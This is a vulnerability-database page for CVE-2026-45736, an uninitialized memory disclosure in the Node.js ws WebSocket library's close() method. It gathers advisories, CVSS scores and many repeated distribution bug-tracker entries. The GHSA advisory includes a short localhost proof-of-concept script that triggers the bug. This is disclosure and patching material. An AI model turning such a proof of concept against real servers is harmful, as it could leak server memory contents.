CVE-2026-45736
published 2026-05-15CVE-2026-45736: ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory…
PriorityP343high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
0.72%
49.2th percentile
ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.
Affected
71 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform-24 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-25 | lightspeed-rhel8 | — | — |
| ansible-automation-platform-26 | gateway-rhel9 | — | — |
| ansible-automation-platform-26 | lightspeed-rhel9 | — | — |
| ansible-automation-platform-27 | gateway-rhel9 | — | — |
| ansible-automation-platform-27 | lightspeed-rhel9 | — | — |
| ansible-automation-platform | automation-portal | — | — |
| ansible-automation-platform | bootc-automation-portal-rhel9 | — | — |
| apache | thrift | — | — |
| clusterlabs | pcs | — | — |
| container-native-virtualization | kubevirt-console-plugin | — | — |
| container-native-virtualization | kubevirt-console-plugin-rhel9 | — | — |
| cryostat | cryostat-openshift-console-plugin-rhel9 | — | — |
| debian | ceph | — | — |
| discovery | discovery-ui-rhel9 | — | — |
| gatekeeper | gatekeeper-rhel9 | — | — |
| grafana | grafana | — | — |
| mozilla | thunderbird | — | — |
| odf4 | mcg-core-rhel9 | — | — |
| odf4 | ocs-client-console-rhel9 | — | — |
| odf4 | odf-console-rhel9 | — | — |
| odf4 | odf-multicluster-console-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-419-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-pf5-rhel9 | — | — |
| openshift-lightspeed | lightspeed-console-plugin-rhel9 | — | — |
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ghsa4.4MEDIUM
vendor_redhat7.5HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
ws: Uninitialized memory disclosure
ghsa·2026-05-18·CVSS 4.4
CVE-2026-45736 [MEDIUM] CWE-908 ws: Uninitialized memory disclosure
ws: Uninitialized memory disclosure
### Impact
The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument.
### Proof of concept
```js
import { deepStrictEqual } from 'node:assert';
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer(
{ port: 0, skipUTF8Validation: true },
function () {
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`, {
skipUTF8Validation: true
});
ws.on('close', function (code, reason) {
deepStrictEqual(reason, Buffer.alloc(80));
});
}
);
wss.on('connection', function (ws) {
ws.close(1000, new Float32Array(20));
});
```
### Patches
The vulnerability was fixed in [email protected] (https://github.com/websockets/ws/commit/c0327ec15
VulDB
websockets ws up to 8.20.0 websocket.close Reason uninitialized resource (GHSA-58qx-3vcg-4xpx)
vuldb·2026-05-15·CVSS 4.4
CVE-2026-45736 [MEDIUM] websockets ws up to 8.20.0 websocket.close Reason uninitialized resource (GHSA-58qx-3vcg-4xpx)
A vulnerability marked as problematic has been reported in websockets ws up to 8.20.0. This affects the function websocket.close. Performing a manipulation of the argument Reason results in uninitialized resource.
This vulnerability is cataloged as CVE-2026-45736. It is possible to initiate the attack remotely. There is no exploit available.
It is suggested to upgrade the affected component.
Red Hat
ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
vendor_redhat·2026-05-15·CVSS 7.5
CVE-2026-45736 [HIGH] CWE-824 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.
A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.
Package: cryostat/cryostat-openshift-console-plugin-rhel9 (Cryostat 4) - Affected
Package: cryostat-openshift-console-plugin-npm (Cryostat 4) - Affected
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2026-45736 python-jupytext: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 python-jupytext: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 python-jupytext: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 dotnet9.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 dotnet9.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 dotnet9.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 qt5-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-23·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 qt5-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 qt5-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-22·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 python-jupyterlab_pygments: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 golang-github-apache-beam-2: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 golang-github-apache-beam-2: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 golang-github-apache-beam-2: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 rust: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 rust: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 rust: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 onnxruntime: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 onnxruntime: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 onnxruntime: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 seamonkey: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 thrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 pcs: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 pcs: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 pcs: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 fcitx5: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 fcitx5: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 fcitx5: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 magicmirror: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 python-ipyparallel: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 jupyterlab: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 nodejs-aw-webui: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 nodejs-aw-webui: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 nodejs-aw-webui: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 forgejo: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 forgejo: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 forgejo: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 magicmirror-module-onthisday: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 magicmirror-module-onthisday: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 magicmirror-module-onthisday: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 yarnpkg: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 mozjs78: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 mozjs78: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 mozjs78: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 dotnet8.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 dotnet8.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 dotnet8.0: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 h3: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 h3: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 h3: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 cachelib: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 qt6-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 qt6-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 qt6-qtwebengine: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
CVE-2026-45736 openbao: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [epel-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
bugzilla·2026-06-19·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
CVE-2026-45736 fbthrift: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray` [fedora-all]
Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.
Bugzilla
CVE-2026-45736 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
bugzilla·2026-05-15·CVSS 7.5
CVE-2026-45736 [HIGH] CVE-2026-45736 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
CVE-2026-45736 ws: ws: Uninitialized memory disclosure via `websocket.close()` with `TypedArray`
ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.
https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpxhttps://access.redhat.com/errata/RHSA-2026:26638https://access.redhat.com/errata/RHSA-2026:26994https://access.redhat.com/errata/RHSA-2026:27171https://access.redhat.com/errata/RHSA-2026:29197https://access.redhat.com/errata/RHSA-2026:7655https://access.redhat.com/security/cve/CVE-2026-45736https://bugzilla.redhat.com/show_bug.cgi?id=2477914https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpxhttps://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-45736.json
2026-05-15
Published